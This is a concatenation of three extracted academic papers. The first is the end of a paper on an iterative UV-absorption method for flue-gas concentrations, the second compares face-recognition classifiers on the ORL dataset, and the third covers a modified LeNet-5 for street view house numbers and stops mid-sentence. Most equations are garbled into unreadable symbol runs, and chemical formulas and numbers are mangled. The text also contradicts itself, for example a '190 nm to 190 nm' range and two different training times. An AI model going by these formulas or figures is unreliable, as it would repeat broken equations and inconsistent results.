by absorption, and iC is the ith the concentration of the gas. Which gas is equal to the total absorbance and of each gas absorption degree. IV. CIRCULAR ITERATION STEPS Circular iteration method using various gases in 190 ~ 290 nm band characteristic absorption peak, combined with the absorbance of dual stack, a feature in some gas absorption point assuming that other gas no absorption, launched the initial concentration of the gas, then switch to another characteristic absorption point, the gas absorbed photon number from the measured total absorbed photon number subtracting, get another gas initial concentration, and so on to get the initial concentration of each gas. Then return to the first, the characteristics of the gas absorption point from the total number of photons absorbed minus every other gas absorption of the photon number, again to get the first gas concentration of an iteration, and so on to get other gas concentrations of an iteration, the repeated iteration until the concentration difference between two times smaller than a certain value, the concentration of each gas to the gas concentration accurately. Algorithm steps are as follows. First step: to solve the first gas in the gas mixture of initial concentration 10C , and selects a characteristic wavelength 1 , under the specific wavelength of a gas in the gas mixture has obvious characteristic absorption peak, and other gas absorption peak is small at this point, is to read the value of the absorbed photon number 1S and solve R D S D       is obtained by absorbance look-up table and the concentration of the gas as the initial concentration of mixed gas in the gas. Step 2: solving the second gas in the gas mixture of initial concentration: select the second characteristic wavelength in the wavelength of 2 second kind of gas has obvious absorption peak, and other gas absorption peak is weak, then 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 16 read the absorbed photon number 2S considered under the band is only two kinds of mixed gas, according to formula (7) to calculate the second gas absorbance, look-up table against solving calculation, the second gas concentrations, as the second kind of initial concentration 20 C of gases. Step 3: calculating of other gases in the mixed gases, the initial concentration: the mth characteristic wavelengths selected m ,the wavelength of the first m gas has obvious absorption peak, read the wavelength of absorption of the photon number mS by formula (7) and look-up table type inversion calculation of this kind of gas concentration as the initial concentration 0mC of the gas. Step 4: iterative inversion to calculate the first gas concentration of first order recursive: will the desires of all kinds of gas concentration in formula (7), again read 1  of 1 S  , reverse the first gas concentration 11C of first order recursive. Step 5: repeat the second and third step to calculate gas m first order recursive concentration 1mC . Step 6: calculation of gas concentration of the adjacent two iterative error; Calculating first-order differential iteration of each gas is shown in the following formula, 1 1om m C C    Select 1 maximum of first-order differential iteration as the iteration error, i.e 1 1max , 1, 2,...,m m M     Step 7: repeat the fourth, fifth and sixth step, until the iteration error is less than the given value namely. n G     Step 8: termination of the algorithm, it will be the last time the concentration as a final concentration of gases. V. THE EXPERIMENTAL RESULTS AND ANALYSIS The obtained by experiments, 2So , 2No , the NO and 3 NH four gas absorption lines as shown in figure 1, in the range of 190 nm to 190 nm, four types of gas are interfered with each other. At wavelength of 1 (273.33nnl) 2 So and 2No are absorbed. Also at wavelength of 2 (231.33nm) 2 So and 2No are absorbed. Only at wavelength of 3 (225.88nm) NO , 2So and 2No are absorbed. At wavelength of 4 (208.23nm) 3 NH 、 2No and 2So are absorbed. The 2So and 2No have absorbed at each wavelength point, For 3NH and NO , and, as long as the concentration of 2So and 2No first came out, and then the corresponding concentration on wavelength 3 or 4 of the absorbance minus the can get their absorbance. So should first of all, the concentration of 2So and 2No , then the concentration of 3NH and NO . Figure 1. Mixed gas absorption spectrum A. Calculate the concentration of 2So and 2No For the concentration of 3NH and NO are the premise of know the concentration of 2So and 2No . However, 2So and 2No throughout the working wave band are interfered with each other, need an algorithm to eliminate their interference. Here, on the basis of the look-up table using loop iteration method and calculation method to determine the concentration of 2 So and 2No . Figure 2. The absorption spectrum of 2 So and 2 No 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 17 As shown in figure 2, At the wavelength of 1 and 2 at the 2So and 2 No were absorbed, they differ greatly in the absorption intensity at two wavelengths, the absorbance of the absorbance of 2No at 273.33nm is far less than the same concentration of 2No in 231.33nm, and the 2So absorbance at 231.33nm is far less than the same concentration of 2So in the absorbance at 273.33nm. Then we can be absorbed in 231.33nm 2No called the main absorption of 2No , 2No in the absorption of 273.33nm is called 2So interference, 2So in the absorption at 273.33nm is the main absorption, in 231.33 absorption interference on 2No main absorption. Iterative method is through circulation calculation to gradually eliminate the interference of 2No on 2So , the true concentration approaching 2So and 2No . Cyclic iteration method to overcome the conflict there understand equations caused no solution of the problem, and this method can be easily implemented by software programming. Statistical chart concentrations of 2So and 2 No calculated with iteration number as shown in the figure 3-4. The abscissa is the number of iterations, the longitudinal concentration coordinates 2So and 2No (ppm). 0 10 20 30 40 50 60 1 2 3 4 5 Figure 3. The results of calculation curves of iteration number and 2 So concentration 239 240 241 242 243 244 245 246 247 248 1 2 3 4 5 Figure 4. The results of calculation curves of iteration number and 2 No concentration According to the running results and statistics can be seen in figure, the process of iteration is a successive approximation process, the calculation results of 2So with the increase in the number of iterations decreases gradually, and tends to be stable, but 2No is exactly the opposite, results with increasing iteration times increase. Cyclic iterative method in two iterations later effect is not obvious, which is to say as long as two iterations. This can be calculated through 2No and 2So concentrations. B. Calculate the concentration of NO and 3NH Because the NO and 3NH absorption in the selected wavelengths of 3 and a wavelength of 4 does not interfere with each other, so it can be separated by the concentration of total absorbance and the 2So and NO : calculation. Hypothesis has been obtained in the mixed gas of 2No and 2So for C1 concentration and C2 concentration, the NO and 3NH for C3 and C4, then at the wavelength of 3 according to the superposition of absorbance of the available, 0 3 1 2 1 2 lg( ) I I A A A A A A      1 A is the C1 concentration of 2No absorbance at 225.8nm, 2A is the C2 concentration of 2So absorbance at 225.8nm, A is a mixture of gases in the 225.88nm total absorbance at 225.88nm, 3A is NO of total absorbance. 0 I is the spectral intensity of 225.88nm through zero gas, I is the intensity of 225.88nm through transmission into the mixed gas after, can be obtained directly by the spectrometer, 2A and 3A concentrations of A and 2No obtained by. Absorbance of 3A so you can get the NO in 225.88nm, then according to the concentration and absorbance at 225.88nm correspondence between the NO table to calculate the concentration of NO . The absorbance of 4A 3NH can be obtained with the same method in 208.23nm, then according to the corresponding relationship between concentration and absorbance at 208.23nm 3NH for 3NH concentration. VI. CONCLUSION Main harmful components for atmospheric environmental pollution monitoring requirements, using uv wavelength grating type continuous frequency measuring method, 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 18 precision is put forward to solve the various harmful ingredient concentration of recursive iteration fast inversion algorithm, and validates the effectiveness of the algorithm. Portable flue gas analyzer based on this algorithm is based on embedded technology, sensor based on micro spectrometer data collection, using uv light source through the spectrum analysis method analysis of flue gas concentration, achieved through the use of a miniature spectrum analyzer to a variety of gas composition at the same time for the purpose of accurate measurement. The product has compact structure, high measuring accuracy, strong anti-interference, high sensitivity etc, has a broad application prospect and popularization value. ACKNOWLEDGMENT The authors wish to thank the cooperators. This research is partially funded by the Project funds in shaanxi province department of education (15JF019) and the Project funds in shaanxi province department of science industrial projects(2015GY067). REFERENCE. [1] Zhu Fa-hua, Li Hui, Qiu Shu-guang. Development and Application of Continuous Em ission Monitoring Technology[J]. Administration and Technique of Environmental Monitoring 2010(22) [2] Lei Tian-xue. The present situation of the portable flue gas analyzer[J]. Administration and Technique of Environmental Monitoring. 1998(10) [3] Ju Hui, Wu Yi-hui, Development situation of micro spectrometers[J]. Optics and Precision Engineering. 2004.9(4). pp372-376 [4] Shi Baosong, Sun Shouhong, Zhang Wei.Application of CCD in the portable spectrometer[J].Electronic Measurement Technology. 2010(11) [5] Limited ARM Development Guide 2000-2001. ARM DOI. 2000.06. [6] Dong, Qing. Ocean wave spectrum from SAR image using 2D-ARMA model.IEEEInternational Geosciences and Remote Sensing Symposium, 2005, 991-994 [7] Chen Zhi-gang. Discussion on Application of Lambert-Beer law in test [J]. Acta Metrologica Sinica.1985(1) [8] Pop, Paul.Embeddedsystems design:Optimization challenges.Lecture Notes in ComputerScience, 2005, 35(24):16-20 work_idtsy3ntjzbwzcdkb2lm4zacoy ---- International Journal of Advanced Network, Monitoring and Controls Volume 05, No.03, 2020 DOI: 10.21307/ijanmc-2020-024 23 A Comparative Study of Face Recognition Classification Algorithms Wang Changyuan School of computer science and engineering Xi’an Technological University Xi’an, China E-mail: cyw901@163.com Li Guang Northwest Institutes of Advanced Technology Xi’an Technological University Xi’an, China E-mail: 865413666@qq.com Xue Pengxiang School of computer science and engineering Xi’an Technological University Xi’an, China E-mail: xuepx@xatu.edu.cn Wu Qiyou School of computer science and engineering Xi’an Technological University Xi’an, China E-mail: 314650592@qq.com Abstract— Due to the different classification effects and accuracy of different classification algorithms in machine learning, it is inconvenient for scientific researchers to choose which classification algorithm to use. This paper uses the face data published by Cambridge University as an experiment. The experiment first reduces the dimensionality of the data through the principal component analysis (PCA) algorithm, extracts the main features of the data, and then respectively through linear logic classification, linear discrimination LDA, nearest neighbor algorithm KNN, support vector machine SVM and the integrated algorithm Adaboost are used for classification. By comparing the advantages and disadvantages of the classification performance and complexity of different algorithms, the final review reviews accuracy, recall, f1-score, and AUC as evaluation indicators. Keywords-Classification Algorithm; Machine Learning; Face Recognition; Model Evaluation I. INTRODUCTION With the rise of artificial intelligence and machine learning, face recognition technology is widely used in life, such as station security, time and attendance punching, and secure payment [1-3], but different face recognition devices use different algorithms. Therefore, this paper analyzes and compares the commonly used classification algorithms in face recognition. The data set in this paper uses the ORL face data set published by Cambridge University in the United Kingdom. The methods used involve linear logistic regression, linear discriminant analysis (LDA), K-Nearest Neighbor (KNN), support vector machine (SVM), Naïve Bayes (NB) and other methods. The definition and advantages and disadvantages of the act are briefly explained. Finally, the five methods are compared and analyzed according to the evaluation indicators such as the accuracy rate, recall rate, F1-score, and AUC area commonly used in machine learning. International Journal of Advanced Network, Monitoring and Controls Volume 05, No.03, 2020 24 II. RELATED WORK A. Principal component analysis PCA data dimensionality reduction The data set contains a total of 400 photos. We use the machine learning library Scikit-learn provided by python to process the data, and display part of the data set pictures as shown in Figure1. Figure 1. ORL partial face image The experimental data has 4096 features per picture. Since the number of features is much greater than the number of samples, it is easy to regenerate overfitting during training. Therefore, a principal component analysis algorithm is required to reduce the dimensions of the features and select K main features as the input of the data set. . The main idea of PCA [4] uses the covariance matrix to calculate the degree of dispersion of samples in different directions, and selects the direction with the largest variance as the main direction of the sample set. Processing process: a) Data preprocessing normalizes and scales the data first. Normalization makes the mean value of data features 0, and scaling is to solve the case where feature values are different by an order of magnitude. b) Calculate the covariance matrix and eigenvectors of the processed data. The eigenvectors can be obtained by singular value decomposition. c) Retain the feature vector and feature value corresponding to the largest first K feature values to form an orthogonal basis. d) Project the sample into a low-dimensional space, and the acquired dimensionality-reduced data can represent the original sample approximately, but with a certain degree of distortion. This paper use formula (1) to calculate the distortion of PCA.      m i m i i approx i X m XX m X 1 2 )( 1 2 )()( 1 1 (1) Through scikit-learn processing, the reduction rate after dimensionality reduction is obtained from the PCA model diagram is shown in Figure 2. It can be seen from the figure that the larger the value of k, the smaller the distortion rate. As k continues to increase, the data reduction rate will approach 1 Using this rule, choose between 10 and 300, and perform sampling calculation every 15th. Under the k features of all samples, the reduction rate is obtained after processing by the PCA algorithm. We select the reduction ratios at 98%, 90%, 80%, and 70%, and the corresponding k values are 195, 75, 32, and 20. The corresponding pictures after PCA processing are displayed. The first line of the image is the original image, and then each column corresponds to the It is a picture at different reduction rates. The lower the reduction rate, the more blurred the image is shown in Figure 3. Figure 2. Relationship between reduction rate and K characteristics International Journal of Advanced Network, Monitoring and Controls Volume 05, No.03, 2020 25 Figure 3. Relationship between reduction rate and K characteristics B. Research on classification method 1) Logistic Regression Supervised learning is the most widely used branch of machine learning in industry. Classification and regression are the main methods in supervised learning. Linear classifier is the most basic and commonly used machine learning model. This paper uses linear logistic regression to classify and recognize faces. The prediction function of linear regression is:   X X X X x T n n                         . . . ......,)(h 1 0 10 (2) Where is the prediction function, x is the feature vector, To handle the classification problem, this paper hope that the value of the function is [0,1], This paper introduce the Sigmoid function: z e z    1 1 )(g (3) Combined with linear regression prediction function: X T T e Xz       1 1 )(g)(g(x)h (4) If there is a simple binary classification of class A or class B, then this paper can use Sigmoid as the probability density function of the sample, and the result of the input classification can be expressed by probability: 1),|0(),|1(   xyPxyP (5) The cost function is a function that describes the difference between the predicted value and the true value of the model. If there are multiple data samples, the average value of the replacement price function is obtained. It is expressed by J(θ). Close to, based on the maximum likelihood estimate available cost function J (θ).     m i iiii xhyxhy m J 1 )()()()( ))(1log()1()(log(( 1 )(   (6) 2) Linear Discriminant Analysis (LDA) Linear Discriminant Analysis (LDA) [5 ， 6] , also known as Fisher Linear Discriminant (FLD), was introduced into the field of machine learning by Belhumeur. LDA is a dimensionality reduction technique in supervised learning, which can not only reduce dimensionality but also classify, and mainly project data features from high latitude to low latitude space. The core idea is that after projection, the projection points of the same category of data should be as close as possible, and the distance between the category centers of different categories of data should be increased as much as possible [5]. If the data set has two data sets, for the center of the two classes Then within-class scatter matrix (within-class scatter matrix): International Journal of Advanced Network, Monitoring and Controls Volume 05, No.03, 2020 26 T xx T xx uxuxuxux S )()()()( 21 2211 w 21      (7) Between-class scatter matrix: T b uuS )2u)(2u( 11  (8) 3) KNN Among N training samples, find the k nearest neighbors of the test sample x. Suppose there are m training samples in the data set, and there are c categories, namely   c  ,... 1 , and the test sample is x. Then the KNN algorithm can be described as: Find k neighbors of x in m training samples, among which the number of samples belonging to category wi in k neighbors of x are kckk ,..., 21 , then the discriminant function is cikxg ii ,...2,1,)(  (9) The core idea of K-nearest neighbor algorithm [7] is to calculate the distance between unlabeled data samples and each sample in the data set, take the K nearest samples, and then K neighbors vote to decide the type of unlabeled samples. KNN classification steps: a) Prepare the training sample set X, which contains n training samples, and select an appropriate distance measurement method according to specific requirements. This paper use dis(xa,xb) to represent the distance between ax and bx in the sample set. b) For the test sample x, use the distance measurement formula to calculate the distance between the test sample x and n samples to obtain the distance set Dis, where  ),(),...,,(),,(is 21 n xxdisxxdisxxdisD  . c) Sort the distance set, select the smallest k elements from it, and get k samples corresponding to k elements. d) Count the categories of these k samples, and obtain the final classification results by voting. Assuming that x_test is an unlabeled sample and x_train is a labeled sample, the algorithm is as follows: Figure 4. K nearest neighbor algorithm For distance measurement, Euclidean distance, Manhattan distance, Chebyshev distance, etc. are usually used. Generally, Euclidean distance is mostly used, such as the distance between two points and two points in N-dimensional Euclidean space. )(d 1 21a b    N i ii xx (10) 4) SVM Support Vector Machine (SVM)[7] for short is a very important and extensive machine learning algorithm. Its starting point is to find the optimal decision boundary as far as possible, which is the farthest from the two types of data points. Furthermore, is the farthest from the boundary of the two types of data points, so the data point closest to the boundary is defined as a support vector. Finally, our goal becomes to find such a straight line (multi-dimensional called hyperplane), which has the largest distance from the support vector. Make the generalization ability of the model as good as possible, so SVM prediction of future data is also more accurate, as shown in Figure 5 below. Find the best Dahua margin. International Journal of Advanced Network, Monitoring and Controls Volume 05, No.03, 2020 27 Figure 5. Classification model diagram Let this plane be represented by g(x)=0, its normal vector is represented by w, the actual distance between a point and the plane is r point, and the distance from the plane can be measured by the absolute value of g(x) (called the function interval) . li bXWy WW i T i T bw ....1 ,1)( 2 1 min ,   (11) The penalty function is also called the penalty function, which is a kind of restriction function. For constrained nonlinear programming, its constraint function is called a penalty function, and the coefficient is called a penalty factor. The objective function of SVM (soft interval support vector machine) with penalty factor C is: Figure 6. Introduction of C classification model diagram    l T bw CWW 1i , 2 1 min  ， (12) Advantages of SVM: a) Non-linear mapping is the theoretical basis of SVM method, SVM uses inner product kernel function to replace the nonlinear mapping to high-dimensional space; b) The optimal hyperplane to divide the feature space is the goal of SVM, and the idea of maximizing the classification margin is the core of the SVM method; c) Support vector is the training result of SVM. It is the support vector that plays a decisive role in SVM classification decision. d) SVM is a novel small sample learning method with a solid theoretical foundation. It basically does not involve probability measurement and the law of large numbers, so it is different from the existing statistical methods. In essence, it avoids the traditional process from induction to deduction, realizes efficient "transduction inference" from training samples to forecast samples, and greatly simplifies the usual classification and regression problems. 5) Naive Bayes Naive Bayes [8, 9] is a conditional independence assumption, and there is no correlation between leave and leave. Suppose there is a labeled data set, where the data set has a total of categories, and for new samples, this paper predict the value. This paper use statistical methods to deal with this problem, so this paper can understand it as the probability of the category to which the sample belongs. The conditional probability formula is: )|( XCP k (13) Therefor Ck ∈ [C1, C2 … , Cm] , this paper only require the probabilities of m categories, the category International Journal of Advanced Network, Monitoring and Controls Volume 05, No.03, 2020 28 belongs to the largest value, and use Bayes' theorem to solve: )( )|()( )|( XP CXPCP XCP kk k  (14) And because x has n feature vectors, it is in the determined data set ， Ck , P(x) are fixed values, according to the joint probability formula: P(Ck)P(x|Ck) = P(Ck, x) (15) III. EXPERIMENTAL RESULTS The data set in this paper uses the ORL face data set of Cambridge University, a total of 400 photos. After experimental analysis, this paper chose PCA to reduce the information rate after dimensionality reduction to 98%, and select 195 as the main features of each picture as data input. In order to make the experimental results more generalized, 80% of the data set is used as the training set and 20% is used as the test set. The 10-fold cross-validation method is used during model training. In order to ensure that the experimental results run the same data every time, a fixed random seed is set Is 7. For the test standard, this paper selected the accuracy rate (P), recall rate (R), F value, and AUC area. Compared with our prediction results, the accuracy rate indicates how many true positive samples are in the positive prediction samples. There are two possibilities for the prediction results, that is, the positive prediction is positive (TP), and the negative prediction is positive (FP), the formula is: FPTP TP P   (16) The recall rate refers to our original sample, indicating how many positive examples in the sample were predicted correctly. There are also two possibilities, that is, the original positive class is predicted as a positive class (TP), and the other is to predict the original positive class as a negative class (FN). FNTP TP R   (17) F1 combines the results of precision rate and recall rate. When F1 is higher, it means that the verification method is more effective. RP PR F   2 1 (18) TABLE I. THE COMPARISON OF EXPERIMENTAL RESULTS OF FIVE CLASSIFICATION ALGORITHMS PCA+LR PCA+LDA PCA+SVM PCA+KNN PCA+NB Precision (%) 99 98 94 59 91 Recall (%) 99 96 91 45 85 Fl-score (%) 99 96 91 44 85 IV. CONCLUSION Face recognition technology [10] has become one of the most popular research directions in computer vision and has made great achievements. With the development of computer technology, more and more classification methods will appear. This thesis is only through several common mainstream classification methods for experimental analysis and comparison. Through experiments, it is found that the PCA + linear logic classification method has obvious advantages in accuracy rate and recall rate. However, specific analysis should be combined with specific issues. Then I am ready to do experiments on different data sets, understand more classification algorithms, and constantly improve my results. International Journal of Advanced Network, Monitoring and Controls Volume 05, No.03, 2020 29 REFERENCES [1] Wu Xiaotian. Research on Face Recognition Algorithm in Subway Security Inspection [D]. Dalian Jiaotong University, 2017. [2] Chen Fuqiang. Research on invalid face filtering method in video attendance [D]. Southwest Jiaotong University, 2018. [3] Ma Yukun. Research on key technologies of face-based secure identity authentication [D]. Beijing University of Technology, 2018. [4] Pattern Analysis; New Pattern Analysis Findings from King Saud University Discussed (Pcapool: Unsupervised Feature Learning for Face Recognition Using Pca, Lbp, and Pyramid Pooling) [J]. Journal of Robotics & Machine Learning, 2020. [5] Zhang Yuting, Chen Junhua, Yang Xinkai, Zhang Liyan. An improved PCA+LDA face recognition algorithm [J]. Computer Knowledge and Technology, 2020, 16(03): 221-222. [6] Guan‐Hua Huang, Chih‐Hsuan Lin, Yu‐Ren Cai, Tai‐Been Chen, Shih‐Yen Hsu, Nan‐Han Lu, Huei‐Yung Chen, Yi‐Chen Wu. Multiclass machine learning classification of functional brain images for Parkinson's disease stage prediction [J]. Statistical Analysis and Data Mining: The ASA Data Science Journal, 2020, 13(5). [7] Ou Lisong. Design and improvement of face recognition system based on SVM [J]. Network Security Technology and Application, 2019(12): 58-60. [8]Liu Jie, Song Bo. Naive Bayesian Classifier Based on Genetic Simulated Annealing Algorithm [J]. Procedia Engineering, 2011, 23. [8] Tie Fuzhen. Application of face recognition system in hotel industry [J]. Computer Products and Circulation, 2020(07): 81+97. [9] Jiang Ajuan, Zhang Wenjuan. A summary of face recognition [J]. Computer Knowledge and Technology, 2019, 15(02): 173-174+190. [10] Youqiang Zhang, Guo Cao, Bisheng Wang, Xuesong Li. A novel ensemble method for k -nearest neighbor [J]. Pattern Recognition, 2019, 85. work_ie6u4zqq7vhp3k4oezpc3koj2q ---- Paper Title (use style: paper title) DOI: 10.21307/ijanmc-2019-058 International Journal of Advanced Network, Monitoring and Controls Volume 04, No.03, 2019 47 Street View House Number Identification Based on Deep Learning Yang Haoqi School of computer science and engineering Xi’an Technological University Xi’an, China e-mail: curioyhq@gmail.com Yao Hongge School of computer science and engineering Xi’an Technological University Xi’an, China e-mail: 835092445@qq.com Abstract—In this paper, the difficult problem of character recognition in natural scenes caused by many factors such as variability of light in the natural scene, background clutter and inaccurate viewing angle, and inconsistent resolution. Based on the deep learning framework PyTorch, a convolutional neural network is implemented. Based on the classic LeNet-5 network, the network optimizes the input layer to accept three-channel images, changes the pooling method to maximum pooling to simplify parameters, and the activation function is replaced by Rectified Linear Unit with faster convergence. The cross- entropy loss is used instead of the minimum mean square error to mitigate the slow learning. Furthermore, we also enroll the gradient descent optimization algorithm RMSprop and L2 regularization to improve the accuracy, speed up the convergence and suppress the over-fitting. The experiment results show that our model achieved an accuracy of 92.32% after training for 7h24min on the street view house number(SVHN) dataset, effectively improving the performance of LeNet-5. Keywords-House Number Identification; Convolutional Neural Network; Lenet-5 I. INTRODUCTION The traditional method of classifying house numbers from natural scene images is usually to use manual feature extraction[1-2] and template matching[3-4]. In order to identify the house number of the corridor environment, Zhang Shuai et al. used the combination of Robert edge detection and morphological operation to locate the position of the house number image, and then divide the house number by horizontal and vertical projection method, tilt correction, etc., and finally use pattern recognition to identify the house number [5]. Ma Liling et al. used the linear discriminant linear local tangent space alignment algorithm (ODLLTSA) and the support vector machine (SVM) method to identify the house number, use the extracted features to train the SVM classifier, and use the SVM classifier to the new house number classification [6]. For these traditional methods, the key to determining their performance is to have a good classifier, and the features in the classifier are mostly designed manually (such as SIFT, SURF, HOG, etc.), and the features of the artificial design are well interpreted. However, in the face of complex backgrounds, changing fonts and various deformations, it is rather troublesome and difficult to extract more general features[7]. The Convolutional Neural Network (CNN) is a multi-layered supervised learning neural network. Although the training process requires a large amount of data compared with the traditional method, the convolutional neural network can automatically summarize the target feature from these data. Features do not require human intervention. Overcome the shortcomings of manual design features that are time- consuming and labor-intensive, have poor general use and require high experience in the designer field. It is precise because of these advantages of convolutional neural networks that a large number of researchers have begun to apply it to solve character recognition problems. In response to this situation, we implemented a LeNet-5-based neural network based on the deep learning framework PyTorch and achieved an accuracy of 92.32% on the SVHN dataset at a time of 6 hours and 17 minutes. II. RELATED WORK A. Network structure The network used in this experiment is modified by LeNet-5 as shown in Figure 1. LeNet-5 appeared to solve the problem of recognition of handwritten characters. The data set used in the training process is the MNIST. The samples in the data set are single- International Journal of Advanced Network, Monitoring and Controls Volume 04, No.03, 2019 48 channel grayscale images, and the street view dataset is The three-channel color picture, to improve the robustness of the model, minimize the intervention on the original data set, we do not pre-process it, such as grayscale, but choose to adjust the input layer of LeNet-5 to three channels. Figure 1. Network structure The pooling layer in the original LeNet-5 network is very different from the currently recognized pooling layer operation, so we replace it directly with the max- pooling layer, which on the other hand reduces the number of trainable parameters of the network. It is conducive to controlling the scale of the network and speeding up the training. In terms of the activation function, the activation function in the original LeNet-5 is Sigmoid or TanH. Here we use a Rectified Linear Unit (ReLU) with faster convergence speed and no significant impact on the generalization accuracy of the model. LeNet-5's loss function is Minimum Mean Squared Error:    Where is the number of samples， represents the predicted value of the ith sample, and is the labelof the th sample. In the case of back-propagation by the gradient descent method, the minimum mean square error is easy to occur when the neuron output is close to ‘1’ and the gradient is too small to learn slow. We use the cross-entropy loss function here:    In addition to the above improvements, we will introduce four optimization algorithms, SGD (with momentum), Adam, Adamax, and RMSprop. B. Comparison effects of different optimizers The package ‘torch.optim’ in PyTorch encapsulates a large number of optimization algorithms, which are often referred to as optimizers. In Figure 2, we take the more common SGD, Adam, Adamax and RMSprop optimizers according to the parameters listed in Table 1.After 90 epochs training, compare their optimization effects on the SVHN dataset used in the improved LeNet-5 network proposed in this paper. It can be seen from Figure 2 that the network using the SGD optimizer has almost no improvement in the test set accuracy in the first 14 epoch, and the 14th epoch only starts to rise significantly; the network using the other three optimizers is in the toptenepochs, a good test set accuracy rate is obtained, and the test set accuracy of the network using the RMSprop optimizer is the fastest. So in the next experiment, we will use RMSprop as the default optimizer. TABLE I. OPTIMIZER PARAMETER SETTING Optimizer parameter SGD lr=0.001, Adam lr=0.001, Adamax lr=0.002, RMSprop lr=0.001, Figure 2. Optimizer effect It can be observed from Figure 2 that the accuracy of the test set except the SGD optimizer is not improved much in the later stage of training, and the accuracy of the test set of the other three networks even shows a small downward trend. Table 2 shows the statistics in Figure 2. The data of test sets with high accuracy rate, the difference ofhighest accuracy rate on the SVHN test set is only 1.793816%, which can be considered as the optimization effect of the four optimizers on the accuracy rate; From the position of the highest test set accuracy, only the 7th epoch appears in the network using the SGD optimizer. The highest test set accuracy of the network using the other three optimizers is relatively high, indicating that theperformanceofthese three optimizers in the latter part of the trainingdecreased. It may be that the International Journal of Advanced Network, Monitoring and Controls Volume 04, No.03, 2019 49 network has been over-fitting, and it is necessary to introduce evaluation and avoid over-fitting. TABLE II. OPTIMIZERS TRAINING RESULTS optimizer Top Accuracy/% SGD 87.350184 Adam 89.090000 Adamax 88.955900 RMSprop 88.676000 C. Comparison of the application of L2 regularization with the appropriate weight attenuation coefficient In the face of possible over-fitting, one possible inhibitory measure is the introduction of regularization. We first use the L2 regularization and introduce the training set accuracy rate, training set loss, test set loss three indicators to enrich the evaluation results of the experimental results. The experimental design is shown in Table 3. The default optimizer is RMSprop (lr=0.001, alpha=0.9), the maximum iteration number is still set to 90epoch, and the L2 pooling corresponding weight attenuation coefficient (weight_decay) is the best and the best. The resulting position is shown in Table 3, and the corresponding accuracy and loss curves are shown in Figure 2-6. It can be seen from Table 3 and Figure 4 that the training set loss curves show a smooth downward trend under the four values of the weight attenuation coefficient. Comparing the training set accuracy rate of Figure 3 with the test set accuracy rate of Figure 5, it can be seen that the accuracy rate under the corresponding weight attenuation coefficient is about 5% up and down, within an acceptable range, but the weight attenuation coefficient in Figure 6 is The loss curve of the test set at 0.001 is firstly decreased and then increased. This indicates that the over-fitting phenomenon appears under this parameter, which indicates that the improved LeNet-5 network proposed in this paper is attenuated by the weight of 0.001 when training on the SVHN dataset. The coefficient can not suppress the over-fitting, we should choose a higher weight attenuation coefficient; from Table 3, we can see that the data with the weight attenuation coefficient of 0.0025 is better than the weight attenuation coefficient of 0.005 and 0.01. On the accuracy curve of the test set in Figure 5, the curve with the weight attenuation coefficient of 0.0025 is higher than the curve with the weight attenuation coefficient of 0.005 and 0.01, and the weight attenuation coefficient is 0.0025 in the later stage of the training process. More obvious and less shocking. The above analysis shows that among the selected four sets of weight attenuation coefficients, the weight attenuation coefficient of 0.0025 can avoid over-fitting and achieve better training results. TABLE III. RESULT OF DIFFERENT WEIGHT DECAY weight_decay Train Acc%(e) Test Acc%(e) 0.01 89.01538(85) 87.14659(85) 0.005 91.59397(57) 88.95590(57) 0.0025 94.51470(88) 90.01229(88) 0.001 97.21119(90) 89.70498(24) Figure 3. Training Accuracy of different regularization Figure 4. Training Loss of different regularization International Journal of Advanced Network, Monitoring and Controls Volume 04, No.03, 2019 50 Figure 5. Test Accuracy of different regularization Figure 6. Tetst Loss of different regularization III. EXPERIMENT AND ANALYSIS A. SVHN(The Street View House Numbers) Currently, for the identification task of the street view number, the better public data set is the SVHN data set. The SVHN dataset is a real-world image dataset focused on the development of machine learning and target detection algorithms with minimal need for data preprocessing and format conversion. There are ten types of labels in the dataset. Each class represents 1 number. For example, the category label of the number "1" is 1, and so on. The label of "9" is 9, and the label of "0" is 10. In general, the SVHN dataset contains three subsets: training set, test set, and extended set; the data set is divided into two formats based on the difficulty of recognition: a character-level bounding box containing the entire house number and a small number of wall backgrounds. The full resolution image (Figure 7); a 32x32 pixel centered on a single number similar to the MNIST dataset format image (Figure 8). The latter style is highly similar to the classic MNIST dataset, but is larger and more difficult to identify: the training set consists of 73,257 hard-to- recognize digital images, and the test set consists of 26,032 digital images, with an additional set of 531131. A simpler digital image that can be used to extend the test set. Unless otherwise stated, the SVHNdataset mentioned later in this article refers to the dataset in the format after cropping. Figure 7. SVHN-Complete house number Figure 8. SVHN-Part number B. Data augmentation Augmenting the data set is also an effective means to improve the accuracy of the model. The size of each subset of the SVHN dataset is shown in Table 4, where the extension set official mentions that it can be used to extend the training data. Figure 9-11 shows a small number of samples and their labels in each subset. It International Journal of Advanced Network, Monitoring and Controls Volume 04, No.03, 2019 51 can be seen that the resolution and brightness of the extended set are high and the background interference is small. The human eye recognition is indeed higher than the training set and test set, that is, It is said that the recognition of the extended set is relatively difficult, but the addition of the extended set can make the training set expand to 8.25 times, which is still expected to improve the accuracy of the model. Figure 12 shows the distribution of the original training set, extension set and test set ("1" for the number 1, "2" for the number 2, ..., "10" for the number 0), which can be seen in the three sub-categories The proportional distribution of each category is approximated, so the distribution of the new training set incorporating the extended set is similar to the distribution of the original training set. This correlation helps to suppress the disadvantages brought by the introduction of the extended set to the model training. influences. TABLE IV. AUGMENTATION RESULT Subset category Number of samples Training set 73257 Extra set 531131 Test set 26032 Figure 9. Example of train set Figure 10. Example of extra set Figure 11. Example of test set Figure 12. Category distribution of SVHN The effect of 90 epoch training before and after the introduction of the extended set is shown in Table 5 and Figure 13. One point that needs to be specially stated is that the visualization tool Visdom we use has an automatic zoom function when drawing, which automatically hides the blank area of auto-hide the chart. Therefore, the different training sets in Figure 13 correspond to the vertical axis starting position and scaling of the chart. It's the same. The accuracy of the training set is lower than 95% and the loss curve of the test set shows a downward trend, indicating that there is no over-fitting phenomenon after expanding the data set; the accuracy of the test set is gradually reduced in the later period. The small description model tends to converge, and it can be seen that the model after the extended training set is higher than the extended training set. From Table 5, it can be seen that the training time after the expansion of the training set is 4 hours and 53 minutes, and the best accuracy rate is increased by 2.31254% compared with the expansion. TABLE V. RESULT AFTER DATA AUGMENTATION Train sample number test sample number Best test accuracy time 73257 26032 90.01229 1h24min 604388 26032 92.32483 6h17min Figure 13. Training of the model after adding data augmentation International Journal of Advanced Network, Monitoring and Controls Volume 04, No.03, 2019 52 Figure 14. Figure 1 Test result IV. CONCLUSION The convolutional neural network applied in the SVHN dataset to improve the classic LeNet-5 network is: (1) modify the input 